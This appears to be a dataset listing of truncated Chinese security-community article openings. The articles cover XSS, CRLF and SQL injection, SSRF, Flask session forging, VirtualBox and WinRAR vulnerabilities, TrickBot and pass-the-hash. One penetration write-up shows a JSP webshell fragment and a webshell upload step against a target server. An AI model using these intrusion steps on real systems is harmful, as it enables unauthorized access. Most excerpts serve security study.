我使用Burp进行枚举,用高级选项来控制测试范围。
然后我一个接一个的浏览应用程序,特别是要寻找可能有反射型的参数。我还使用了`Burp的 Actively scan defined insertion
points`功能去扫描url参数。
继续Fuzz
## 枚举api
通过`https://github.com/GerbenJavado/LinkFinder`去枚举所有的接口,尝试发现其他的url。
最后这个工具会通过html的方式得出所有的api
最终导致这个接口容易受到XSS的攻击。 起初我检查了反射型。
从下图中可以看出,TEST值正在被反射出来。 进一步的... | 社区文章 |
原文地址:<https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545>
在本文中,我们将向读者详细介绍如何将回车符和换行符注入内部API调用。一年前,我曾经在GitHub上写过一篇这方面的[文章](https://gist.github.com/tomnomnom/6727d7d3fabf5a4ab20703121a9090da
"文章"),但是,话说回来,哪里可不是发布文章的最佳平台,对吧?当然,这篇文章中,我会添加更多的细节,而不是对原来那篇文章的简单复制和粘贴。
实际上,我个人还是更倾心于白盒测试的,因为,黑盒测试并不是我的... | 社区文章 |
**作者:林以**
**公众号:[支付宝安全实验室](https://mp.weixin.qq.com/s/ZpdPwySu0U1QVJ9GOJBNkw
"支付宝安全实验室")**
Oracle在北京时间4月15日发布了本年度第二次的Critical Patch Update
Advisory,并在最新版VirtualBox(6.1.6)中修复了支付宝光年安全实验室@鹜望与@林以提交的USB
XHCI模块的堆越界读写漏洞。这篇文章将对此漏洞进行分析。
## VirtualBox USB XHCI漏洞模块介绍
VirtualBox是一款虚拟化软件,由于其开源属性,在个人用户中盛行。VirtualBox大部分模块是开源的,但是部分模... | 社区文章 |
# 极验2019交互安全行业研究报告
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
2019
年已经过去,在过去的一年,经济下行对各个行业带来地冲击有目共睹,以数字货币带动的整个区块链行业昙花一现之后几乎销声匿迹;资本从狂热到保守,前几年频繁曝光的投融资消息,2019
寥寥无几;曾经大肆铺张烧钱的运营拉新活动也屈指可数。
寒冬已至,即使如履薄冰也需要稳步前行,不论是大的经济趋势还是国内政策导向,都需要我们更加注重设计合理的业务流程、严格把控内容安全的红线、减少不必要的运营支出。
我们回顾 2019 全年的业务安全问题,从多个角度剖析了业务安全所面临的挑战,并给出了建议的处理方式。
这篇报告主要聚... | 社区文章 |
本文为翻译文章,原文链接:<https://www.shawarkhan.com/2020/11/exploiting-blind-postgresql-injection.html>
## 前言
父老乡亲们大家晚上好,我是 Shawar Khan,距离上次writeup已有些时日,近日偶有小成,post出来跟大家分享一下。
想跟大家分享很多新东西,但是本篇文章只是披露其中一个Web应用程序,该程序基于python开发。由于这是SYNACK上(一个漏洞赏金平台)的目标,所以我会把目标替换为`redacted.com`或`Redacted
Org`。
由于该平台评价规则是质量为上,这意味着最好的质量报告才能获胜,所以我的重点是编写具有... | 社区文章 |
# 幽灵间谍:“TrickBot”新变种运用“无文件”技术发起攻击
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x1 前言
近日,360互联网安全中心捕捉到一例“TrickBot”银行木马新变种。相比较过去出现过的“TrickBot”银行木马,该新变种攻击过程中无任何文件落地,包括载荷下载、窃密、屏幕截图在内的所用功能都由一段PowerShell命令完成。
“TrickBot”银行木马最早出现于2016年底,主要通过挂马网页、钓鱼文档传播,进入受害者计算机后窃取计算机中邮箱密码、浏览器中存储的网站凭证等敏感数据,注入浏览器窃取网银帐户密码,盗取受害者资产。
## 0x2 新变种运用“无... | 社区文章 |
# TEMPESTSDR:一个远程捕获计算机屏幕的SDR工具
##### 译文声明
本文是翻译文章,文章原作者 admin,文章来源:rtl-sdr.com
原文地址:<https://www.rtl-sdr.com/tempestsdr-a-sdr-tool-for-eavesdropping-on-computer-screens-via-unintentionally-radiated-rf/>
译文仅供参考,具体内容表达以及含义原文为准。
## 工具概述
TEMPEST是指一些间谍机构通过捕获无线电发射信号(包括声音、震动等)以窃听电子设备的技术。所有的电子产品都会在工作过程中发出射频信号,而通过捕获和处理这些信号就可以恢... | 社区文章 |
## # 0x01 前言几句
平时使用burp进行简单的测试,遇到各种各样的问题,使用各种各样的方法,我们可以抓包、改包、重放、爆破,同时有很多BApp
Store有很多开源的扩展工具,今天我想要分享的是巧用一个名为“Extractor”的扩展插件和Burpsuite
Marco的结合用法,获取他在你解决某些场景下的anti-token的问题时候可以有所帮助。
## # 0x02 Extractor
#### **1\. 是什么?**
> **A Burp extension for generic extraction and reuse of data within HTTP
> requests and responses.*... | 社区文章 |
# 从HCTF两道Web题谈谈flask客户端session机制
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
>
> 这次hctf中有两道获取flask的secret_key生成客户端session的题目,为了能做出这两道题目来也是深入研究了一下flask客户端session的生成机制。所以这篇文章主要详细讨论一下flask客户端session的生成以及校验过程,以及在了解了flask客户端session机制后这两道题的解法。
个人第一次见到关于客户端session的文章是pith0n师傅的一片文章[客户端session导致的安全问题](https://www.leavesongs.com/... | 社区文章 |
**序**
这是我自己对于应急响应归纳出来的方法论,一个笼统的、抽象的概念,包含思路和方法。
【PS:本篇不包含工具,不包含任何具体的东西】
【文章仅代表我本人,不具备任何权威性,专题系列转载请标明出处】
**0x10常见应急响应流程**
这是我自己的经验总结出来的应急响应流程,也是我自己去应急时的流程。
【如果图片模糊请留言或直接联系博主拿图】
* 0x11响应
这里不讨论应急响应人员能不能到现场,这里讨论通用场景。
(1)判断事件类型
事件类型分为7类:大规模沦陷、挖矿病毒、勒索病毒、无文件落地、不死(顽固)马、钓鱼应急响应、数据劫持。【后续会细讲】
去应急肯定会收到通知:ga的通... | 社区文章 |
# KB22871997是否真的能防御PTH攻击?
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:xiaom@云影实验室
## 前言
在内网渗渗透时,当我们通过GPP漏洞等方式获取到凭据后,将会使用这组凭据进行横向移动,进行权限提升。不管通过哪种方式获取到了明文密码或者HASH,横向移动是必不可少的一步,攻击者会使用常见的Psexec式(psexec
psexec_psh),Wmi式(wmicmd、wmiexec)、winrm式(evil-winrm)这几种方式来远程执行命令,除了这几款之外,目前还有一款综合式的远程执行命令的工具crackmapexec,此款工具支持多种执行方式,并且支持... | 社区文章 |
> 翻译文章,原文链接:<https://0xpatrik.com/osint-people/>
>
> 原文作者:[Patrik Hudak](https://0xpatrik.com/)
在这篇文章中,继续讨论与OSINT相关的主题,我们将着眼于研究人员。与[域名](https://0xpatrik.com/osint-domains/)类似,在我们的“人员分析”中有一些特定的目标:
* 这个人是我们新认识的人。我们想找到一些关于他/她的信息。
* 你想雇用一名新员工。除了HR的标准背景检查之外,你可能想要执行你的OSINT以查看他/她是否是一个优秀的候选人。
* 你希望向某个特定公司的知名人士推销新的商业产品。你需... | 社区文章 |
前段时间ysoserial又更新了一个链Click1,网上好像一直没人分析,最近在学习java,就稍微分析下。
# 一、 利用代码
Click1依赖click-nodeps-2.3.0.jar,javax.servlet-api-3.1.0.jar
click-nodeps应该是个冷门项目,搜不到太多信息,所以此链也就看看就好,增加一点关于java反序列化的知识。
<https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Click1.java>
不想重新编译ysoserial的,或者只想要POC的,可以用我重构的... | 社区文章 |
# 看我如何利用JavaScript全局变量绕过XSS过滤器
|
##### 译文声明
本文是翻译文章,文章原作者 secjuice,文章来源:secjuice.com
原文地址:<https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/>
译文仅供参考,具体内容表达以及含义原文为准。
## 写在前面的话
如果你发现你的攻击目标存在XSS漏洞,但是你所有的漏洞利用尝试似乎都被XSS过滤器(或输入验证和Web应用防火墙规则)屏蔽掉了的话,那你该怎么办?非常好,在这篇文章中,我们将告诉大家如何利用JavaScript全局变量来绕过这些XS... | 社区文章 |
# NAT Slipstreaming攻击使防火墙形同虚设
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
2020年10月31日安全研究员Samy Kamka发布了一种被称为NAT Slipstreaming的攻击颠覆了人们对防火墙中NAT安全性认知。
NAT
Slipstreaming,利用诱骗了受害人访问可能受到黑客控制的网站后,则允许攻击者绕过受害人的网络地址转换(NAT)或防火墙安全控制,远程访问绑定到受害者计算机的任何TCP/UDP服务。
NAT
Slipstreaming结合了通过定时攻击或WebRTC链接内部IP提取,自动远程MTU和IP碎片发现,TCP数据包大小按摩的内部IP... | 社区文章 |
# tcache在pwn题中常见的利用姿势
## 前言
tcache是 glibc 2.26(ubuntu 17.10)
之后引入的一种技术,目的是提升堆管理的性能,最近tcache机制的pwn题越来越多,趁着春节放假,学习了一下tcache在pwn题中是如何利用的。下面通过几条tcache的题目,分享下此类题目常规利用姿势。
## 题目链接
链接: <https://pan.baidu.com/s/11EIvOiNOsFTFWavScsR7eQ> 提取码: vter
需要使用Ubuntu17.04以上版本进行练习。
## tcache基础知识
tcache的介绍可以参考CTFwiki:<https://ctf-wiki.githu... | 社区文章 |
### 一、问题简介
熟悉以太坊的读者都清楚,在以太坊机制中,为了防止恶意节点滥用区块资源、防止Dos攻击,所以引入了Gas机制。然而防御也是存在某些漏洞隐患的,今天的文章中,我们就根据某些实例中的代码编写问题来展开叙述一下Dos循环的安全漏洞。
也就是说,在合约编写者设计合约代码的时候,不宜使用太大次的循环。由于每一笔交易都是会消耗一定的gas,而实际消耗gas值的多少取决于当前交易内部的复杂度。倘若一个交易中存在大量的循环,那么交易的复杂度会变的更高,此时当超过允许的最大gas消耗量时,会导致交易失败。
### 二、代码分析
#### Simoleon合约
下面我们详细的分析一下相关问题的代码情况。
简单来说`Simoleon`... | 社区文章 |
# 【技术分享】SugarCRM 6.5.23 - REST PHP Object Injection漏洞分析
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**作者:[流浪客@ms509安全团队](http://bobao.360.cn/member/contribute?uid=1350341956)**
**稿费:500RMB(不服你也来投稿啊!)**
**投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿**
SugarCRM开源版是一款完全开放源代码的商业开源软件,具有界面活泼、简单易学的特点。美国SugarCRM公司是一间创立于2006年、但迅... | 社区文章 |
# 利用OpCode绕过Python沙箱
## 0x01 OpCode
> opcode又称为操作码,是将python源代码进行编译之后的结果,python虚拟机无法直接执行human-> readable的源代码,因此python编译器第一步先将源代码进行编译,以此得到opcode。例如在执行python程序时一般会先生成一个pyc文件,pyc文件就是编译后的结果,其中含有opcode序列。
### 如何查看一个函数的OpCode?
def a():
if 1 == 2:
print("flag{****}")
print "Opcode of a():",a.__code_... | 社区文章 |
# 入侵检测系列1(中)基于私有协议的加密流量分析思路(Teamviewer篇)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 写在前面
在上篇文章中,我主要从私有协议的分析方式开始,通过抓取TeamViewer包观察其流量行为,从日志中获取协议的各个行为入手,对协议各个流程进行分解。
详情见:
入侵检测系列1(上):基于私有协议的加密流量分析思路(Teamviewer篇)
<https://www.anquanke.com/post/id/223106>
本文将继续对协议流程进行分解,包括对登陆行为分析(这里指本机连接至Server),发出连接请求,成功连接,两台机器间的通讯和一些其他... | 社区文章 |
**作者:REInject@73lab@青藤实验室**
**原文链接:<https://mp.weixin.qq.com/s/ktGug1VbSpmzh9CEGKbbdw>**
恶意软件或攻击者通常使用计划任务作为他们的持久化机制。从风险发现的角度考虑,理解计划任务的运行和创建方式以及和计划任务相关联的进程是有必要的。此外,本文还分享了一种
**未公开** 的计划任务隐藏方式。
现在,让我们开始了解计划任务的一切。
## 计划任务的创建方式
MSDN 里对计划任务的细节信息描述得很详细了,包括使用的API或工作机制。所以不再重复阐述,只引用一些必要的东西:
计划任务调度器会根据任务的定义在指定的时间触发任务,它包含以下组件:
... | 社区文章 |
# 【技术分享】 CVE-2017-0290:史上最糟糕的Windows远程执行代码漏洞
|
##### 译文声明
本文是翻译文章,文章来源:0patch.blogspot.jp
原文地址:<https://0patch.blogspot.jp/2017/05/0patching-worst-windows-remote-code.html>
译文仅供参考,具体内容表达以及含义原文为准。
****
翻译:[ **shan66**](http://bobao.360.cn/member/contribute?uid=2522399780)
**稿费:240RMB**
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿... | 社区文章 |
原文:<https://www.igorkromin.net/index.php/2018/09/20/retrieving-data-from-hijacked-png-images-using-html-canvas-and-javascript/>
**简介**
* * *
在[上一篇文章](https://xz.aliyun.com/t/2933
"上一篇文章")中,我描述了如何将任意文本数据(就这里来说,就是JSON)存储为PNG图像中的像素。为此,需要将输入数据从JavaScript的字符串转换为Uint8Array,然后在ImageData对象中使用三个通道(RGB)来存储字节,然后,将此图像绘制到画布中,最后保存为P... | 社区文章 |
# Windows内网协议学习Kerberos篇之PAC
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
author: daiker@360RedTeam
## 0x00 前言
这是kerbreos篇的最后一篇文章了。这篇文章主要讲的内容是微软为了访问控制而引进的一个扩展PAC,以及PAC在历史上出现过的一个严重的,允许普通用户提升到域管的漏洞MS14068。
## 0x01 PAC 介绍
网上很多版本的kerberos的流程是
1. 用户向KDC发起AS_REQ,请求凭据是用户hash加密的时间戳,KDC使用用户hash进行解密,如果结果正确返回用krbtgt hash加密的TGT票据
... | 社区文章 |
**作者:国家互联网应急中心CNCERT
公众号:<https://mp.weixin.qq.com/s/DPGnInVDCAEbH6jlRd4vbQ>**
**前言**
国家互联网应急中心(以下简称CNCERT/CC)持续对网站攻击进行抽样监测分析。在获取网站服务器权限后,攻击者往往会留有网站后门(webshell),用于持续保持对被攻击网站的权限。也就是说,网站后门的植入、连接操作往往说明攻击者具有长期控制服务器权限的可能性,尤为值得关注。
**CNCERT/CC尝试从攻击源和被攻击端的角度对网站后门连接进行各维度的态势统计分析,进而观察网站攻击的总体态势,并对其中可能存在的“攻击团伙”进行挖掘和刻画,进而以“攻击团伙”的全... | 社区文章 |
* * *
## 原文地址: <https://github.com/yandex/gixy>
## 概要
Gixy是一个分析Nginx配置的工具。Gixy的主要目标是防止安全性错误配置并自动进行缺陷检测。
目前支持的Python版本为2.7和3.5+。
免责声明:Gixy仅在GNU/Linux上经过良好测试,其他操作系统可能存在一些问题。
目前在Gixy可以找到以下问题:
## [add_header_multiline]多行响应头
您应该避免使用多行响应头,原因如下:
* 它们已被弃用(参见[RFC 7230](https://tools.ietf.org/html/rfc7230#section-3.2.4))
*... | 社区文章 |
# AFL源码分析(Ex.1)——附录(Part 1)
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0\. 写在前面
此文章主要是对`AFL`仓库中`doc`目录下的所有文档进行翻译。
* [x] env_variables.txt(环境变量手册) —— 本文
* [ ] historical_notes.txt(历史记录)
* [ ] INSTALL(安装说明)
* [x] life_pro_tips.txt(使用技巧) —— 本文
* [ ] notes_for_asan.txt
* [ ] parallel_fuzzing.txt
* [ ] per... | 社区文章 |
# 中奖名单公布 | 安全圈活动大盘点(内附干货大补丸)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
2017年马上就要结束了,这一年,安全圈在拉斯维加斯、北京、温哥华、东京、上海等地举办了大大小小近百场安全会议,安全客对BlackHat **、**
ISC、KCON等等大型会议均进行了图文直播。在此,我们整理了一份详细的清单,看看今年你到底错过了哪些重要的会议?
**参与文末的留言活动,获取新年大礼吧~**
## 中奖名单公布
感谢大家一直以来对安全客的大力支持,同时也恭喜下面这些小伙伴获奖~
**用户ID:[s3cnothy](https://www.anquanke.com/member... | 社区文章 |
# 蜻蜓点水Binlog
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 简述
Binlog是记录所有数据库表结构变更以及表数据修改的二进制日志,不会记录SELECT和SHOW这类操作。
Binlog日志是以事件形式记录,还包含语句所执行的消耗时间。
开启Binlog日志有以下两个最重要的使用场景。
主从复制:在主库中开启Binlog功能,这样主库就可以把Binlog传递给从库,从库拿到Binlog后实现数据恢复达到主从数据一致性。
数据恢复:通过mysqlbinlog工具来恢复数据。
## 状态
### 初始状态
通过简单的MySQL的数据,就可以看到初始状态,默认mys... | 社区文章 |
# 1 前言
看了兜哥在freebuf上的专栏文章《学点算法搞安全之HMM(上篇)》,大意就是将URL参数进行范化,然后使用hmm算法来进行训练和测试,这里检测的重点是xss,但是带着我自己的疑问认真看了下方的评论,里面提到一个我非常认同的问题
这里原先是对相同url的参数进行数据提取和训练,那么我们知道一个网站,可能会有上千上万的页面,对应上千上万的url,那么按照这样的思路可能就真的需要去建立上千上万的模型,这显然是不现实的。
那么我们能否将模型范化,去建立一个模型检测一个业务网站的所有的url以及所有url中的异常参数?带着这样的疑问继续找文章,翻到了先知的《Web日志安全分析浅谈》,其中检测的原理就比较硬核了,通过编... | 社区文章 |
**Author: Badcode@知道创宇404实验室**
**Date: 2018/08/20**
**Update: 目前WAM已开源<https://github.com/knownsec/wam>**
404实验室内部的WAM(Web应用监控程序,文末有关于WAM的介绍)监控到 MetInfo
版本更新,并且自动diff了文件,从diff上来看,应该是修复了一个任意文件读取漏洞,但是没有修复完全,导致还可以被绕过,本文就是记录这个漏洞的修复与绕过的过程。
### 漏洞简介
MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo 6.0.0~6.1.0版本中的
`old_thumb.class.p... | 社区文章 |
**作者:唐磊**
**原文链接:<https://www.tanglei.name/blog/a-security-vulnerability-of-spring-validator.html>**
**本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!**
**投稿邮箱:paper@seebug.org**
之前在某厂的某次项目开发中,项目组同学设计和实现了一个“引以为傲”,额,有点扩张,不过自认为还说得过去的
feature,结果临上线前被啪啪打脸,因为实现过程中因为 **一行代码**
(没有标题党,真的是一行代码)带来的安全漏洞让我们丢失了整个服务器控制权(测试环境)。多亏了上线之前有公司... | 社区文章 |
## 背景
Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。
Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式)
的服务基础设施。
Nacos是阿里巴巴于2018年开源的项目,目前在Github中已获得 **19.8** kSt,由此可见其的使用广泛程度。
## 未授权访问漏洞
**threedr3am** 师傅在去年十二月份的时候在Github上给Nacos项目提交了Bypass
认证的Issue,详情可移步<https://github.c... | 社区文章 |
**作者:Joey@天玄安全实验室**
**原文链接:<https://mp.weixin.qq.com/s/F_BIk3slcZ8gXGuQ0T9Pwg>**
## 前言
最近开始分析Office漏洞,拿到CVE-2017-11826的样本后发现无法在Office2010上成功执行,打算分析并改造该EXP。参考了许多资料,结合自己的理解写了本文,供大家学习和参考。
## 漏洞分析
### 分析环境
OS: Win7 x64 SP1
Office: Ofiice 2010 x86
Image name: wwlib.dll
T... | 社区文章 |
# SSH协议流量解密与会话还原
|
##### 译文声明
本文是翻译文章,文章原作者 fox-it,文章来源:blog.fox-it.com
原文地址:<https://blog.fox-it.com/2020/11/11/decrypting-openssh-sessions-for-fun-and-profit/>
译文仅供参考,具体内容表达以及含义原文为准。
不久前,我们参与了一起取证分析事件,客户的一个Linux服务器被入侵,攻击者留了一个OpenSSH后门。客户保存了入侵过程中的完整数据流量包和虚拟机系统快照,我们想看看是否可以从虚拟机快照的内存中提取密钥来解密网络流量中的SSH会话。在本文中,将介绍我对OpenSSH所... | 社区文章 |
# 记一次失败的打点
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 背景
在某次攻防演练的晚上,大佬给我一个网站,说有一个RCE漏洞打一下试试,抱着试试就逝世的心态,进行了打点行动。
## 上传webshell
在web目录发现了一个已存在木马xx.jsp
<%if(request.getParameter("f".getBytes());%>< a href="One_OK"></ a>
利用已经存在的上传后门,构建一个html表单来上传我们的自己木马
<form action="http://xx.x.x.x:8080/scdc/xx.jsp?f=fuckjp.jsp"... | 社区文章 |
# SQL注入速查表
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/>
译文仅供参考,具体内容表达以及含义原文为准。
**SQL注入的基本知识**
所谓SQL注入,就是通过把SQL命令插入到Web表单提交,输入域名或页面请求的查询字符串中,最终达到欺骗服务器并执行恶意SQL命令的目的。具体来说,它是利用现有的恶意软件,然后将(恶意)的SQL命令注入到后台数据库引擎并执行相应的查询语句,它可以通过在Web表单中输入SQL语句来得到一个存在安全漏洞的网站数据库,而不... | 社区文章 |
# 【缺陷周话】第 7 期 :缓冲区上溢
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
>
> 代码审计是使用静态分析发现源代码中安全缺陷的方法,能够辅助开发或测试人员在软件上线前较为全面地了解其安全问题,防患于未然,因此一直以来都是学术界和产业界研究的热点,并且已经成为安全开发生命周期
> SDL 和 DevSecOps 等保障体系的重要技术手段。
>
> 360代码卫士团队基于自主研发的国内首款源代码安全检测商用工具,以及十余年漏洞技术研究的积累,推出“缺陷周话”系列栏目。每周针对 CWE、OWASP
> 等标准中的一类缺陷,结合实例和工具使用进行详细介绍,旨在为广大开发和安全人员提供代码审... | 社区文章 |
作者:[acez@长亭科技](https://zhuanlan.zhihu.com/p/27733895?utm_medium=social&utm_source=wechat_timeline&from=timeline&isappinstalled=1)
中文翻译:[kelwin](http://weibo.com/kelwinyang)
#### 1\. 介绍
2017年3月,长亭安全研究实验室(Chaitin Security Research Lab)参加了 Pwn2Own
黑客大赛,我作为团队的一员,一直专注于 VMware Workstation Pro
的破解,并成功在赛前完成了一个虚拟机逃逸的漏洞利用。(很不)... | 社区文章 |
## **前言:**
**学习新知识,这次通过Weblogic 存在的SSRF漏洞和ssrf-lab,来学习SSRF漏洞**
## 0x00 了解SSRF
### SSRF简介:
`SSRF(Server-Side Request
Forgery)`,即服务器端请求伪造,利用漏洞伪造服务器端发起请求,从而突破客户端获取不到数据限制,本质上是属于信息泄露漏洞。
### **SSRF漏洞原理:**
`SSRF` 形成的原因大都是由于 **服务端** 提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制
。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等,而且在大部分的 **web服务器架构中** , **w... | 社区文章 |
# 无法解密!首个利用WinRAR漏洞传播的未知勒索软件(JNEC)分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 背景
2019年3月17日,360威胁情报中心截获了首个利用WinRAR漏洞(CVE-2018-20250[4])传播未知恶意勒索软件的ACE文件[1]。该恶意压缩文件名为vk_4221345.rar,当受害者在本地计算机上通过WinRAR解压该文件后便会触发漏洞,漏洞利用成功后会将内置的勒索软件写入到用户计算机启动项目录中,当用户重启或登录系统都会执行该勒索软件从而导致重要资料被加密。
由于该勒索软件执行后并没有保存生成的RSA公私钥,也没有通过其他渠道将公私钥信息发送... | 社区文章 |
# 【技术分享】Python新型字符串格式漏洞分析
|
##### 译文声明
本文是翻译文章,文章来源:安全客
原文地址:<http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/>
译文仅供参考,具体内容表达以及含义原文为准。
翻译:[shan66](http://bobao.360.cn/member/contribute?uid=2522399780)
预估稿费:100RMB(不服你也来投稿啊!)
投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://bobao.360.cn/contribu... | 社区文章 |
网鼎杯第四场,完全被虐着打,根本就打不过,
原文地址:<https://www.o2oxy.cn/1817.html>
# 签到题
# comment
爆破得到账号密码 zhangwei zhangwei666
同时发现git 泄露 get 源代码。发现write_do.php 中很一个很有意思的地方
然后发现可以构成二次注入:
思路是这样的
1、 观察了一下发现是两张表 board 、comment
首先写评论的时候数据写到board 然后再次评论的时候 category这个变量会从 board
表中读取然后构成二次注入
如下图:
也就是说comment 中的category 字段是直接取 board字段。构造成二... | 社区文章 |
# hackrf接收ADS-B飞机信号
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前记
本次讲解的是使用hackrf接收ADS-B飞机广播信号,通过接收ADS-B信号可以获取附近范围内,飞机的航班号,飞行高度,经纬度,轨迹等信息。本文将使用hackrf进行接收ADS-B信号,并对其原理以及实验复现进行讲解。希望大家能从中有所收获!
广播式自动相关监视(英语:Automatic dependent surveillance –
broadcast,缩写ADS–B)是一种飞机监视技术,飞机通过卫星导航系统确定其位置,并进行定期广播,使其可被追踪。空中交通管制地面站可以接收这些信息并作为二... | 社区文章 |
# Input function
在 python2 大量的内置函数中,input() 函数是一个很大的安全隐患,它在标准输入流中获取到的任何内容,都会作为 python 代码执行
λ python2
>>> input()
dir()
['__builtins__', '__doc__', '__name__', '__package__']
>>> input()
__import__('sys').exit()
λ
显然,除非脚本在标准输入流获取的数据受到完全信任,否则永远不能使用 input() 函数。在 python2 中建议使用 raw_input()
作为安全的替... | 社区文章 |
此系统文章总共分为四篇,分别是手法篇、工具篇、隐藏篇、总结篇;本篇为隐身篇,主要介绍黑帽seo中一些隐身的手段。黑帽seo与其他黑产行为不同的是,它需要时间去创造价值。如果是倒卖数据,只需要入侵服务器脱裤走人,而黑帽seo需要潜伏在服务器上一段时间,因为它主要靠引流来创造价值。那么如何做到不被服务器运维发现就至关重要了,也是黑帽seo行为是否能最终成功的关键。
<!-- more -->
### 隐身的技术
在处理的一些入侵应急响应事件中,我们发现有些网站被挂恶意页面达数月甚至数年之久,而在此期间管理员竟然毫无察觉。有时这并非是管理员的粗心大意,而是黑客过于狡猾。在了解了我之前所介绍的网页劫持手段后,我想你大概能了解这其中的缘由... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.